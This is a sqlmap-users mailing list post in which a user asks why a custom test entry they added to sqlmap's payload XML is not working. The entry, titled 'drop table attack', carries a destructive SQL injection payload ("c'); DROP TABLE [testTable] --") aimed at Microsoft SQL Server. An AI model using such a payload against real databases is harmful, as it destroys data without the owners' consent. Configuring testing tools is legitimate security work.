<l.g> writes:

> 
> Hi! In payloads.xml I substituted this snippet:
> 
> <!-- End of AGAINST boolean full-text search boundaries -->
> <!-- Boolean-based blind tests - WHERE/HAVING clause -->
> <test>
>     <title>drop table attack</title>
>     <stype>2</stype>
>     <level>1</level>
>     <risk>5</risk>
>     <clause>1</clause>
>     <where>1</where>
>     <vector>c'); DROP TABLE [testTable] --</vector>
>     <request>
>         <payload>c'); DROP TABLE [testTable] --</payload>
>         <comment>--</comment>
>     </request>
>     <response>
>         <grep>object</grep>
>     </response>
>     <details>
>         <dbms>Microsoft SQL Server</dbms>
>     </details>
> </test>
> <test>
>     <title>AND boolean-based blind - WHERE or HAVING clause</title>
>     <stype>1</stype>
>     <level>1</level>
>     <risk>1</risk>
>     <clause>1</clause>
>     <where>1</where>
>     <vector>AND [INFERENCE]</vector>
>     <request>
>         <payload>AND [RANDNUM]=[RANDNUM]</payload>
>     </request>
>     <response>
>         <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
>     </response>
> </test>
> 
> with this:
> 
> <!-- End of AGAINST boolean full-text search boundaries -->
> <!-- Boolean-based blind tests - WHERE/HAVING clause -->
> <test>
>     <title>AND boolean-based blind - WHERE or HAVING clause</title>
>     <stype>1</stype>
>     <level>1</level>
>     <risk>1</risk>
>     <clause>1</clause>
>     <where>1</where>
>     <vector>AND [INFERENCE]</vector>
>     <request>
>         <payload>AND [RANDNUM]=[RANDNUM]</payload>
>     </request>
>     <response>
>         <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
>     </response>
> </test>
> 
> but it doesn't work.
> Thank you
> 
Sorry! I inverted the snippets in the previous post.

This is what I added to std xml:

<test>
    <title>drop table attack</title>
    <stype>2</stype>
    <level>1</level>
    <risk>5</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>c'); DROP TABLE [testTable] --</vector>
    <request>
        <payload>c'); DROP TABLE [testTable] --</payload>
        <comment>--</comment>
    </request>
    <response>
        <grep>object</grep>
    </response>
    <details>
        <dbms>Microsoft SQL Server</dbms>
    </details>
</test>




_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
